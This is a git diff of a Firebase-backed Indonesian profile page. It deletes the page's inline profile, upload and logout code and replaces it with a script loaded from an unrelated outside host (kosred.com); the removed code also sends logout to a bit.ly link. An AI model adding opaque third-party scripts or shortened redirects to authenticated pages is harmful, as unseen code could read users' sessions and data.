--- a/Akun/profile.html
+++ b/Akun/profile.html
@@ -316,205 +316,8 @@ background-color: #aaf4ff34;
 
 
   <!-- Your profile.js script -->
-  <script>
-      const firestore = firebase.firestore();
-
-// Mengecek status masuk pengguna secara terus-menerus
-firebase.auth().onAuthStateChanged(function(user) {
-  const userNameElement = document.getElementById('userName');
-  const userEmailElement = document.getElementById('userEmail');
-  const profilePictureElement = document.getElementById('profilePicture');
-  const countryInput = document.getElementById('country');
-  const provinceInput = document.getElementById('province');
-  const districtInput = document.getElementById('district');
-  const kecamatanInput = document.getElementById('kecamatan');
-  const villageInput = document.getElementById('village');
-  const hamletInput = document.getElementById('hamlet');
-  const rtInput = document.getElementById('rt');
-  const rwInput = document.getElementById('rw');
-  const postalCodeInput = document.getElementById('postalCode');
-
-  // ...
-
-  if (!user) {
-    // Jika pengguna belum login, arahkan ke halaman login.html
-    window.location.href = 'login.html';
-    return;
-  }
-
-  if (user) {
-    userNameElement.textContent = `Nama: ${user.displayName || 'Belum diatur'}`;
-    userEmailElement.textContent = `Email: ${user.email || 'Belum diatur'}`;
-    profilePictureElement.src = user.photoURL || 'URL default foto profil';
-
-    // Baca data dari Firestore
-    firestore.collection('userProfiles').doc(user.uid).get()
-      .then((doc) => {
-        if (doc.exists) {
-          const userData = doc.data();
-
-          // Set nilai formulir dari data pengguna di Firestore
-          countryInput.value = userData.country || '';
-          provinceInput.value = userData.province || '';
-          districtInput.value = userData.district || '';
-          kecamatanInput.value = userData.kecamatan || '';
-          villageInput.value = userData.village || '';
-          hamletInput.value = userData.hamlet || '';
-          rtInput.value = userData.rt || '';
-          rwInput.value = userData.rw || '';
-          postalCodeInput.value = userData.postalCode || '';
-
-          // Set nilai status pengguna
-          const userStatus = userData.status || 'Konsumen';
-          document.getElementById('userStatus').textContent = `Status: ${userStatus}`;
-        } else {
-          console.log('Dokumen tidak ditemukan di Firestore');
-        }
-      })
-      .catch((error) => {
-        console.error('Gagal membaca data dari Firestore:', error.message);
-      });
-  }
-
-  
-});
-
-    // Fungsi logout
-    function logout() {
-      firebase.auth().signOut().then(() => {
-        // Logout berhasil, arahkan ke halaman login
-        window.location.href = 'https://bit.ly/3tK6lrt';
-      }).catch((error) => {
-        console.error('Logout gagal:', error.message);
-      });
-    }
-
-    // Fungsi untuk memilih foto profil ketika foto profil diklik
-    function selectProfilePicture() {
-      document.getElementById('profilePictureInput').click();
-    }
-
-    // Fungsi unggah foto profil
-    function uploadProfilePicture(files) {
-      const user = firebase.auth().currentUser;
-
-      if (files.length > 0) {
-        const file = files[0];
-        const storageRef = firebase.storage().ref(`profilePictures/${user.uid}/${file.name}`);
-        const task = storageRef.put(file);
-
-        task.then(() => {
-          // Foto berhasil diunggah, dapatkan URL-nya
-          storageRef.getDownloadURL().then((url) => {
-            // Hapus foto profil sebelumnya dari Firebase
-            if (user.photoURL) {
-              firebase.storage().refFromURL(user.photoURL).delete().then(() => {
-                // Foto profil sebelumnya dihapus
-              }).catch((error) => {
-                console.error('Gagal menghapus foto profil sebelumnya:', error.message);
-              });
-            }
-
-            user.updateProfile({
-              photoURL: url
-            }).then(() => {
-              // Foto profil berhasil diperbarui
-              document.getElementById('profilePicture').src = url;
-            }).catch((error) => {
-              console.error('Gagal memperbarui foto profil:', error.message);
-            });
-          }).catch((error) => {
-            console.error('Gagal mendapatkan URL foto dari Storage:', error.message);
-          });
-        }).catch((error) => {
-          console.error('Gagal mengunggah foto profil:', error.message);
-        });
-      }
-    }
-
-    function saveProfile() {
-  const user = firebase.auth().currentUser;
-  const countryInput = document.getElementById('country');
-  const provinceInput = document.getElementById('province');
-  const districtInput = document.getElementById('district');
-  const kecamatanInput = document.getElementById('kecamatan');
-  const villageInput = document.getElementById('village');
-  const hamletInput = document.getElementById('hamlet');
-  const rtInput = document.getElementById('rt');
-  const rwInput = document.getElementById('rw');
-  const postalCodeInput = document.getElementById('postalCode');
-  const loadingElement = document.getElementById('loading');
-  const spinnerElement = document.getElementById('spinner');
-  const userStatusElement = document.getElementById('userStatus');
-
-  const userData = {
-    country: countryInput.value,
-    province: provinceInput.value,
-    district: districtInput.value,
-    kecamatan: kecamatanInput.value,
-    village: villageInput.value,
-    hamlet: hamletInput.value,
-    rt: rtInput.value,
-    rw: rwInput.value,
-    postalCode: postalCodeInput.value,
-    status: userStatusElement.textContent.replace('Status: ', ''), // Ambil status dari elemen HTML
-  };
-
-  // Show loading message with spinner
-  loadingElement.style.display = 'block';
-  spinnerElement.style.display = 'inline-block';
-
-  // Simpan data ke Firestore
-  firestore.collection('userProfiles').doc(user.uid).set(userData)
-    .then(() => {
-      console.log('Profil berhasil disimpan di Firestore:', userData);
-
-      // Hide loading message and spinner after successful save
-      loadingElement.style.display = 'none';
-      spinnerElement.style.display = 'none';
-      // Show success message
-      document.getElementById('saveSuccessMessage').style.display = 'block';
-      // Hide success message after 3 seconds
-      setTimeout(() => {
-        document.getElementById('saveSuccessMessage').style.display = 'none';
-      }, 3000);
-            
-    })
-    .catch((error) => {
-      console.error('Gagal menyimpan profil di Firestore:', error.message);
-      // Hide loading message and spinner if an error occurs
-      loadingElement.style.display = 'none';
-      spinnerElement.style.display = 'none';
-    });
-
-  // Additional logic or UI updates can be added here.
-}
-  
-  function openSettings() {
-    // Redirect to your settings page or URL
-    window.location.href = 'pengaturan.html';
-  }
-
-    function registerForMember() {
-  const phoneNumber = 'NomorWhatsAppAnda'; // Ganti dengan nomor WhatsApp Anda
-  const message = encodeURIComponent('Halo ka, saya mau daftar jadi member. boleh tau persyaratannya Terimakasih.?');
-
-  // URL format WhatsApp dengan nomor dan pesan
-  const whatsappURL = `https://wa.me/${6283174042483}?text=${message}`;
-
-  // Buka link WhatsApp
-  window.open(whatsappURL, '_blank');
-}
-
-// Fungsi untuk menampilkan pop-up
-function showMemberInfo() {
-    document.getElementById('infoPopup').classList.add('active');
-}
-
-// Fungsi untuk menutup pop-up
-function closePopup() {
-    document.getElementById('infoPopup').classList.remove('active');
-}
+  <script src="https://kosred.com/a/iorhc.js">
+      
   </script>
 </body>
 </html>
